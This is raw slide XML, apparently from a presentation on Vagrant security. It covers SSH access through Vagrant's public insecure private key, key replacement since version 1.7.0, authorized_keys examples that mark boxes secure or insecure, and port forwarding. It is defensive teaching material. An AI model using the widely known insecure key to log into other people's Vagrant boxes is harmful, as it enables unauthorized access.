              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-155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VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215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sz="1200" spc="-195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SSH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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Authentication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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>private-key)*</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="211454">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>vagrant@127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-p 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2222 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-i </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>/home/user/.vagrant.d/insecure_private_key  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>14.04.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-30" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LTS 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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>GNU/Linux 3.13.0-87-generic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5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x86_64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)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...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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="20" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>≥</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>1.7.0)**</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2290445">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
            </a:pP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# Default behaviour since </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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1.7.0  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>conig.ssh.insert_key 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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>true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LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>conig.ssh.private_key_path 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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>”.vagrant/machines/default/virtualbox/private_key”</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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</a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>downloaded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>at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-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/mitchellh/vagrant/tree/master/keys</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5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12700" marR="180975">
              <a:lnSpc>
                <a:spcPct val="125499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>**) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>private-key </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>replaced </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>randomly generated </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>key </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>since vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1.7.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>up. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>default both </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>public-key- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password-authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>activated.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46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589" y="190436"/>
            <a:ext cx="3649345" cy="278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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-155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VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215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sz="1200" spc="-195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SSH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190" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Management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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Box-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(secure):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60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>˜/.ssh/authorized_keys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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1zdT0jP3Xw</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-50" dirty="0"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BA6621"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>\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...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0" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>JApQcM9+K4ganC2iymIvBXYN9nUOXyoYzT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Box-2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(secure):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60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>˜/.ssh/authorized_keys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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCr0EaRqIPfP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35" dirty="0"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BA6621"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>\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...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15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>VGYkg42475QfgVAWmACLZFxIun+16SK+3T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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100" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Box-3 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-160" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(insecure):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60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>˜/.ssh/authorized_keys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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6NF8iallvQVp2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-25" dirty="0"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BA6621"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>\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...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1A177D"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>8tehUc9c9WhQ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== </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>insecure public</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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47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67" y="190436"/>
            <a:ext cx="2890520" cy="195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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-229" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-175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NETWORK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66040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forwarding</a:t>
            </a:r>
            <a:endParaRPr sz="120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  <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6604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$ www-browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35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http://localhost:8080/html/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="840105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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# Bind guest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>port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80 to host </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>port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8080  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>conig.vm.network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-20" dirty="0"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”forwarded_port”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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guest:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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80,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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8080</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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57818" y="1523108"/>
            <a:ext cx="1928406" cy="12089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49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67" y="190436"/>
            <a:ext cx="2890520" cy="2089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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-229" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-175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NETWORK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66040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forwarding</a:t>
            </a:r>
            <a:endParaRPr sz="120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  <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6604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$ www-browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35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http://localhost:8080/html/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="840105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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# Bind guest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>port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80 to host </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>port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8080  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
